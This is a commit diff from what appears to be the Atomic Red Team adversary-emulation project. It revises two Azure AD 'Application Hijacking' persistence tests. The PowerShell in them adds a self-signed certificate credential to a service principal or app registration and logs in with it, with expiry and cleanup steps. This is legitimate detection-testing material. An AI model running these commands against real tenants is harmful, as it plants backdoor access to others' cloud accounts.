security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merge branch 'master' into am_args

Browse Source
This commit is contained in:
Hare Sudhan
2023-06-10 01:15:53 -04:00
committed by GitHub
parent 546ed5ea1e 49e9c5e04e
commit d22b91cde8
4 changed files with 36 additions and 120 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/azure-ad-index.yaml
+10 -34
View File
@@ -37535,14 +37535,6 @@ persistence:
description: Name of the targeted service principal
type: string
default: SuperSP
certificate_password:
description: Password of the new certificate
type: string
default: Passw0rd
path_to_cert:
description: Path of the new certificate, locally stored
type: string
default: "$env:TEMP"
dependency_executor_name: powershell
dependencies:
- description: 'AzureAD module must be installed.
@@ -37566,21 +37558,18 @@ persistence:
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
Write-Host "Generated certificate ""$thumb"""
$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord
@@ -37593,8 +37582,7 @@ persistence:
-eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from
SP\"\n Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId
-KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
| where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\"
-ErrorAction Ignore\n"
| where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n"
name: powershell
elevation_required: false
- name: Azure AD Application Hijacking - App Registration
@@ -37618,14 +37606,6 @@ persistence:
description: Name of the targeted application
type: string
default: SuperApp
certificate_password:
description: Password of the new certificate
type: string
default: Passw0rd
path_to_cert:
description: Path of the new certificate, locally stored
type: string
default: "$env:TEMP"
dependency_executor_name: powershell
dependencies:
- description: 'AzureAD module must be installed.
@@ -37649,21 +37629,18 @@ persistence:
if ($app -eq $null) { Write-Warning "Application not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
Write-Host "Generated certificate ""$thumb"""
$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord
@@ -37676,8 +37653,7 @@ persistence:
-eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from
application\"\n Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId
-KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
| where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\"
-ErrorAction Ignore\n"
| where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n"
name: powershell
elevation_required: false
T1053.004:
atomics/Indexes/index.yaml
+10 -34
View File
@@ -62806,14 +62806,6 @@ persistence:
description: Name of the targeted service principal
type: string
default: SuperSP
certificate_password:
description: Password of the new certificate
type: string
default: Passw0rd
path_to_cert:
description: Path of the new certificate, locally stored
type: string
default: "$env:TEMP"
dependency_executor_name: powershell
dependencies:
- description: 'AzureAD module must be installed.
@@ -62837,21 +62829,18 @@ persistence:
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
Write-Host "Generated certificate ""$thumb"""
$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord
@@ -62864,8 +62853,7 @@ persistence:
-eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from
SP\"\n Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId
-KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
| where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{service_principal_name}.pfx\"
-ErrorAction Ignore\n"
| where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n"
name: powershell
elevation_required: false
- name: Azure AD Application Hijacking - App Registration
@@ -62889,14 +62877,6 @@ persistence:
description: Name of the targeted application
type: string
default: SuperApp
certificate_password:
description: Password of the new certificate
type: string
default: Passw0rd
path_to_cert:
description: Path of the new certificate, locally stored
type: string
default: "$env:TEMP"
dependency_executor_name: powershell
dependencies:
- description: 'AzureAD module must be installed.
@@ -62920,21 +62900,18 @@ persistence:
if ($app -eq $null) { Write-Warning "Application not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
Write-Host "Generated certificate ""$thumb"""
$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord
@@ -62947,8 +62924,7 @@ persistence:
-eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from
application\"\n Remove-AzureADApplicationKeyCredential -ObjectId $app.ObjectId
-KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
| where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\nrm \"#{path_to_cert}\\#{application_name}.pfx\"
-ErrorAction Ignore\n"
| where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n"
name: powershell
elevation_required: false
- name: AWS - Create Access Key and Secret Key
atomics/T1098.001/T1098.001.md
+8 -20
View File
@@ -42,8 +42,6 @@ An account with high-enough Azure AD privileges is needed, such as Global Admini
| username | Azure AD username | string | jonh@contoso.com|
| password | Azure AD password | string | p4sswd|
| service_principal_name | Name of the targeted service principal | string | SuperSP|
| certificate_password | Password of the new certificate | string | Passw0rd|
| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP|
#### Attack Commands: Run with `powershell`!
@@ -59,21 +57,18 @@ $sp = Get-AzureADServicePrincipal -SearchString "#{service_principal_name}" | Se
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
Write-Host "Generated certificate ""$thumb"""
$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
```
@@ -94,7 +89,6 @@ foreach ($cred in $credz) {
}
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore
```
@@ -136,8 +130,6 @@ An account with high-enough Azure AD privileges is needed, such as Global Admini
| username | Azure AD username | string | jonh@contoso.com|
| password | Azure AD password | string | p4sswd|
| application_name | Name of the targeted application | string | SuperApp|
| certificate_password | Password of the new certificate | string | Passw0rd|
| path_to_cert | Path of the new certificate, locally stored | string | $env:TEMP|
#### Attack Commands: Run with `powershell`!
@@ -153,21 +145,18 @@ $app = Get-AzureADApplication -SearchString "#{application_name}" | Select-Objec
if ($app -eq $null) { Write-Warning "Application not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
Write-Host "Generated certificate ""$thumb"""
$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
```
@@ -188,7 +177,6 @@ foreach ($cred in $credz) {
}
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
rm "#{path_to_cert}\#{application_name}.pfx" -ErrorAction Ignore
```
atomics/T1098.001/T1098.001.yaml
+8 -32
View File
@@ -22,14 +22,6 @@ atomic_tests:
description: Name of the targeted service principal
type: string
default: SuperSP
certificate_password:
description: Password of the new certificate
type: string
default: Passw0rd
path_to_cert:
description: Path of the new certificate, locally stored
type: string
default: $env:TEMP
dependency_executor_name: powershell
dependencies:
- description: |
@@ -49,21 +41,18 @@ atomic_tests:
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
Write-Host "Generated certificate ""$thumb"""
$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{service_principal_name}.pfx" -Password $pwd > $null
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{service_principal_name}.pfx", $pwd)
$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $thumb
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
@@ -82,7 +71,6 @@ atomic_tests:
}
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
rm "#{path_to_cert}\#{service_principal_name}.pfx" -ErrorAction Ignore
name: powershell
elevation_required: false
@@ -107,14 +95,6 @@ atomic_tests:
description: Name of the targeted application
type: string
default: SuperApp
certificate_password:
description: Password of the new certificate
type: string
default: Passw0rd
path_to_cert:
description: Path of the new certificate, locally stored
type: string
default: $env:TEMP
dependency_executor_name: powershell
dependencies:
- description: |
@@ -134,21 +114,18 @@ atomic_tests:
if ($app -eq $null) { Write-Warning "Application not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$certNotAfter = (Get-Date).AddDays(2)
$credNotAfter = (Get-Date).AddDays(1)
$thumb = (New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter).Thumbprint
Write-Host "Generated certificate ""$thumb"""
$pwd = ConvertTo-SecureString -String "#{certificate_password}" -Force -AsPlainText
Export-PfxCertificate -cert "cert:\CurrentUser\my\$thumb" -FilePath "#{path_to_cert}\#{application_name}.pfx" -Password $pwd > $null
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate("#{path_to_cert}\#{application_name}.pfx", $pwd)
$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $thumb
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: |
@@ -166,7 +143,6 @@ atomic_tests:
}
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
rm "#{path_to_cert}\#{application_name}.pfx" -ErrorAction Ignore
name: powershell
elevation_required: false
- name: AWS - Create Access Key and Secret Key